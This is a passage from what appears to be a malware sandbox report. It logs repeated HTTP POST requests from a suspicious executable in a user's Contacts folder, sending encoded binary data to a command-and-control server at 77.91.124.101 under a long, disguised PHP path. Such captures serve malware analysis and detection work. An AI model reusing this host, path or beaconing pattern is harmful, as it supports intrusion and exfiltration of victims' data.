                                                            Data Ascii: WYX_[YZ[]WUWU]WTP[XDV_WS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'+(<*U)0#\8$#%+ 93>2'T9+*\>,']/&G''^)+
                                                            Nov 21, 2023 04:47:39.999308109 CET227INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:39 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2277.91.124.10180192.168.2.549734C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:40.322233915 CET228OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:40.520041943 CET228INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:40.520492077 CET231OUTData Raw: 57 5e 5d 5e 5b 5b 5a 5b 5d 57 55 57 55 5b 57 5b 50 5d 58 40 56 57 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^]^[[Z[]WUWU[W[P]X@VWW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*=Z+89>#?]/Z#=)#.3-*P$:8%<?#^8&G''^)3
                                                            Nov 21, 2023 04:47:40.724601984 CET231INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:40 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            22192.168.2.54973477.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:40.322233915 CET228OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:40.520041943 CET228INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:40.520492077 CET231OUTData Raw: 57 5e 5d 5e 5b 5b 5a 5b 5d 57 55 57 55 5b 57 5b 50 5d 58 40 56 57 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^]^[[Z[]WUWU[W[P]X@VWW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*=Z+89>#?]/Z#=)#.3-*P$:8%<?#^8&G''^)3
                                                            Nov 21, 2023 04:47:40.724601984 CET231INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:40 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2377.91.124.10180192.168.2.549735C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:41.051342010 CET232OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:41.248904943 CET232INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:41.249264956 CET235OUTData Raw: 57 58 58 5e 5e 5a 5a 59 5d 57 55 57 55 5c 57 52 50 5c 58 48 56 5f 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXX^^ZZY]WUWU\WRP\XHV_W[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=)_=+:W=#8,Z 99Y(3&-2W00::;=? ,&G''^)/
                                                            Nov 21, 2023 04:47:41.453973055 CET235INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:41 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            23192.168.2.54973577.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:41.051342010 CET232OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:41.248904943 CET232INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:41.249264956 CET235OUTData Raw: 57 58 58 5e 5e 5a 5a 59 5d 57 55 57 55 5c 57 52 50 5c 58 48 56 5f 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WXX^^ZZY]WUWU\WRP\XHV_W[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=)_=+:W=#8,Z 99Y(3&-2W00::;=? ,&G''^)/
                                                            Nov 21, 2023 04:47:41.453973055 CET235INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:41 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2477.91.124.10180192.168.2.549736C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:41.808120012 CET236OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:42.007024050 CET236INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:42.171473026 CET239OUTData Raw: 57 5d 58 5f 5b 5f 5f 59 5d 57 55 57 55 56 57 50 50 59 58 44 56 57 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W]X_[__Y]WUWUVWPPYXDVWW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'=;)Y?;>)3.'%#:5^?5'.1$>S.+6^?//>&G''^)
                                                            Nov 21, 2023 04:47:42.377120018 CET239INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:41 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            24192.168.2.54973677.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:41.808120012 CET236OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:42.007024050 CET236INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:42.171473026 CET239OUTData Raw: 57 5d 58 5f 5b 5f 5f 59 5d 57 55 57 55 56 57 50 50 59 58 44 56 57 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W]X_[__Y]WUWUVWPPYXDVWW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'=;)Y?;>)3.'%#:5^?5'.1$>S.+6^?//>&G''^)
                                                            Nov 21, 2023 04:47:42.377120018 CET239INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:41 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2577.91.124.10180192.168.2.549738C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:44.099560022 CET241OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2532
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:44.297482967 CET241INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:44.297697067 CET243OUTData Raw: 57 59 58 5e 5b 59 5f 5e 5d 57 55 57 55 5e 57 53 50 58 58 41 56 51 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYX^[Y_^]WUWU^WSPXXAVQW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_=2((.=#7Z8\"*%X?U>3-2'--?<4,&G''^)/
                                                            Nov 21, 2023 04:47:44.501955986 CET244INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:44 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            25192.168.2.54973877.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:44.099560022 CET241OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2532
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:44.297482967 CET241INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:44.297697067 CET243OUTData Raw: 57 59 58 5e 5b 59 5f 5e 5d 57 55 57 55 5e 57 53 50 58 58 41 56 51 57 5c 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WYX^[Y_^]WUWU^WSPXXAVQW\^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_=2((.=#7Z8\"*%X?U>3-2'--?<4,&G''^)/
                                                            Nov 21, 2023 04:47:44.501955986 CET244INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:44 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            26192.168.2.54973977.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:44.819467068 CET244OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:45.015990973 CET245INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:45.016554117 CET247OUTData Raw: 57 5b 58 5d 5b 5a 5a 58 5d 57 55 57 55 57 57 56 50 5a 58 41 56 53 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[X][ZZX]WUWUWWVPZXAVSW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y>=[=+.U>0+[8% *)\)3:P$*S&#1-;.?Z;Y8>&G''^)
                                                            Nov 21, 2023 04:47:45.219712019 CET247INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:44 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2677.91.124.10180192.168.2.549739C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:44.819467068 CET244OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:47:45.015990973 CET245INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:45.016554117 CET247OUTData Raw: 57 5b 58 5d 5b 5a 5a 58 5d 57 55 57 55 57 57 56 50 5a 58 41 56 53 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[X][ZZX]WUWUWWVPZXAVSW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y>=[=+.U>0+[8% *)\)3:P$*S&#1-;.?Z;Y8>&G''^)
                                                            Nov 21, 2023 04:47:45.219712019 CET247INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:44 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            27192.168.2.54974077.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:45.569263935 CET248OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:45.768819094 CET248INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:45.769048929 CET251OUTData Raw: 57 50 5d 5c 5e 5d 5a 5b 5d 57 55 57 55 5e 57 50 50 52 58 45 56 56 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP]\^]Z[]WUWU^WPPRXEVVWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')(+2V)U+]/'%4X(63-&V33>V98)?<?Y,&G''^)+
                                                            Nov 21, 2023 04:47:45.981430054 CET251INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:45 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2777.91.124.10180192.168.2.549740C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:45.569263935 CET248OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:45.768819094 CET248INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:45.769048929 CET251OUTData Raw: 57 50 5d 5c 5e 5d 5a 5b 5d 57 55 57 55 5e 57 50 50 52 58 45 56 56 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WP]\^]Z[]WUWU^WPPRXEVVWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')(+2V)U+]/'%4X(63-&V33>V98)?<?Y,&G''^)+
                                                            Nov 21, 2023 04:47:45.981430054 CET251INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:45 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2877.91.124.10180192.168.2.549741C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:46.303026915 CET252OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:46.500907898 CET253INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:46.507325888 CET255OUTData Raw: 57 5e 5d 5a 5e 59 5a 50 5d 57 55 57 55 5d 57 5b 50 5b 58 42 56 53 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W^]Z^YZP]WUWU]W[P[XBVSW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*^*?].R=U;Z8$&#:!Y+3"P&02:]"Y<,->&G''^)+
                                                            Nov 21, 2023 04:47:46.712269068 CET256INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:46 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
